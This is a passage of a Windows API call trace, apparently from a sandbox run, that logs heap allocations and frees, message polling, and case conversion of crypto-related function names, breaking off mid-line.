[0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.949] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d1d) returned 0xac0018 [0037.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0037.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0037.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d1d) returned 0xac7a68 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.951] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.952] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2c8 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.952] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.953] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.953] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.954] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.955] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.955] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.956] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.956] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.957] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.957] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.958] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.958] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 